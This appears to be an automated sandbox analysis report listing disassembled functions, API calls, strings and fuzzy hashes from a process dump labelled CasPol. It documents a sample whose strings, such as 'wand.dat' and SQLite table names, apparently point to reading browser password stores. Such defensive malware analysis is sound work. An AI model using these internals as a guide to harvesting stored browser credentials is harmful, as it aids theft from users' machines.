                                                                                                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889144086-0
                                                                                                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                    Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1661045500-0
                                                                                                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                    Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                    Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                                                                                                    • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                    Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                    • _wtoi.MSVCRT(?), ref: 00410C80
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                                                    • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                    • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                    Function 0041203E Relevance: 6.1, APIs: 4, Instructions: 85windowkeyboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3550944819-0
                                                                                                                                                                                    • Opcode ID: d3ffb25d57d7eacc3d24d239ecad9e19809d89229f260d5da6b5100bcdd99181
                                                                                                                                                                                    • Instruction ID: b13963ca7945f00a157482356cff4617054a50a9c2c324265242a4647e6472cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ffb25d57d7eacc3d24d239ecad9e19809d89229f260d5da6b5100bcdd99181
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7531D230600300DBDB20DF15CD89BDA37B5BB40314F00817AEA689B2E2D7B99ED1CB18
                                                                                                                                                                                    Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$free
                                                                                                                                                                                    • String ID: g4@
                                                                                                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                                                                                                    • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                    Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                    Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AF07
                                                                                                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                    • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                    Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                    Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                                                    • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                    Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                                                    • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                    Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                    Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                    Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                    Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                    Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                    Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
